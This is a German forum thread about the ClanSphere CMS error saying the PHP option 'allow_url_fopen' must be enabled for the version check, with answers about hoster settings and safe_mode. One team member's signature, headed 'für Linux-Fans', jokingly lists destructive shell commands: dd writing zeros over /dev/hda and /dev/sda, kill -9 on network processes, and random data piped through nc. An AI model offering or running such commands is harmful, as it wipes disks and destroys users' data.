Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 15
Seite [1]
epoxone


Wannabe poster





Beiträge: 36
# Thema - 11.06.2007 um 23:59 Uhr
Hallo!
Wenn ich in meiner installierten CS-Version 2007.0_sp1 über SYSTEN>>VERSION gehe, bekomme ich folgenden Fehler
Fehler: Die PHP-Option "allow_url_fopen" muss aktiviert sein

Da ich mich mit der Thematik noch nicht so doll auskenn, komm ich noch nicht mit allem so schnell klar. Z.b. hab ich keine Ahnung wie ich das aktiviere. Ich nehme mal an, dass die Aktivierung in mods/clansphere/version.php gesetzt werden müsste, weiß aber nicht wo dort genau.

Mit der Suchfunktion hier im Board finde ich auch nichts passendes dazu.

Hat jemand Erfahrung mit dieser Fehlermeldung und weiß wie man diese beheben kann?

Gruß
epoxone
Inaktiv
Skype
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 12.06.2007 um 00:01 Uhr
Das muss über deinen anbieter entweder per httpd-special oder in der php.ini gesetzt werden.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
denimator


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Antwort: 2 - 12.06.2007 um 00:33 Uhr
bist du bei funpic oder einem anderen Freehoster ... dann wird dir das leider nicht freigeschalten werden ...


------------------
mit freundlichen Grüßen - Denimator



Inaktiv
|
epoxone
Thread-Ersteller


Wannabe poster





Beiträge: 36
# Antwort: 3 - 12.06.2007 um 00:36 Uhr
Jep, das könnte die Lösung sein. Die Page an der ich gerade am basteln bin ist bein funpic gehostet... wenn die Seite einigermaßen so ist, wie ich mir sie vorstelle gehts natürlich auf nen bezahlten Server mit .de-Domain

Danke für den Tip!


Inaktiv
Skype
|
simone


Wannabe poster




Beiträge: 32
# Antwort: 4 - 18.02.2008 um 10:19 Uhr
Hi all,

Ich komme auf dieses Problem zurück. Bei mir ist alles auf ON eingestellt, erhalte die Fehlermeldung dennoch. Sieht selbst: http://www.un-clan.eu/phpinfo.php/

Hat mir jemand von euch einen Tipp?

Gruss
Simone


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 5 - 18.02.2008 um 10:22 Uhr
welche Meldung erhälst du denn ?


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
simone


Wannabe poster




Beiträge: 32
# Antwort: 6 - 18.02.2008 um 12:17 Uhr
Hi,

Folgende: Fehler: Die PHP-Option "allow_url_fopen" muss aktiviert sein

Gruss
Simone


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 7 - 18.02.2008 um 12:37 Uhr
ist clansphere auch dort installiert, oder auf einer subdomain ? bei Subdomains kann man allow_url_open auch deaktivieren.

Bitte die phpinfo datei ins hauptverzeichniss vom ClanSphere wo es nich geht.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
simone


Wannabe poster




Beiträge: 32
# Antwort: 8 - 18.02.2008 um 12:47 Uhr
Es ist eine Subdomaine. Hier der Link zur PHPINFO Datei: www.un-clan.eu/mgc/phpinfo.php. Nun ist sie am richtigen Ort. Habe auch bemerkt, dass sie dort auf OFF ist. Wie kann ich das in der .ini schreiben? Ich weiss, dass gewiesse sachen in der .ini selber editieren resp. anlegen kann.

Nachtrag: Ich habe es herausgefunden!!! Danke euch allen!

Gruss
Simone


Zuletzt editiert von simone am 18.02.2008 um 12:50 Uhr (2x Editiert)
Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 9 - 10.09.2010 um 20:38 Uhr
Hallo,

ich bin soeben auch auf diesen Fehler gestoßen und habe mit meinem Hoster gesprochen ob er "allow_url_fopen" nicht aktivieren könne.
Darauf meinte der, dass diese Einstellung einige Sicherheitslücken birgt und daher deaktiviert sein soll laut php. Ausserdem gibt es diesen BEfehl in der kommenden Version php6 sowieso nicht mehr.

Meine Frage also:

Wieso benötigt Clansphere diese Einstellung? Kann man die Versionsprüfung nicht auch anders lösen?


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 10 - 10.09.2010 um 22:35 Uhr
Wieso benötigt Clansphere diese Einstellung? Kann man die Versionsprüfung nicht auch anders lösen?

Nein, da eine Abfrage an einen externen Webserver (also an Csphere.eu) gestellt werden muss. Um aus PHP raus, solch eine Abfrage machen zu können, benötigt man Funktionen welche diese zur Verfügung stellen. Diese sind wiederum von allow_url_fopen abhängig


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 11 - 10.09.2010 um 23:39 Uhr
Ok und wie sieht dass dann an dieser Schnittstelle mit der Sicherheit aus?


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 12 - 11.09.2010 um 01:23 Uhr
die versionsfunktion läd einfach nur eine kleine textdatei von unserer webseite herunter, in der die aktuelle clansphere version drin steht und vergleicht das mit der auf der eigenen webseite installierten clansphere version.

das ist sicher, kein großes ding und lässt sich kaum anders lösen.


Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 13 - 11.09.2010 um 02:36 Uhr
Alles klar, habe mit meinem Hoster gesprochen und der hat die Funktion nun aktiviert. Allerdings hat der immer noch den safe_mode on. Bremst diese Einstellung CS doll aus oder ist das eher unerheblich?


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Inaktiv
|
hajo ClanSphere Team


VIP - Poster




Herkunft: Barsbüttel
Beiträge: 9411
# Antwort: 14 - 11.09.2010 um 06:29 Uhr
eher unerheblich @ safe mode


------------------
ClanSphere - professional clan care starts here

Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 15 - 11.09.2010 um 12:54 Uhr
Gut Danke...


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Inaktiv
|
Antworten: 15
Seite [1]


Sie müssen sich registrieren, um zu antworten.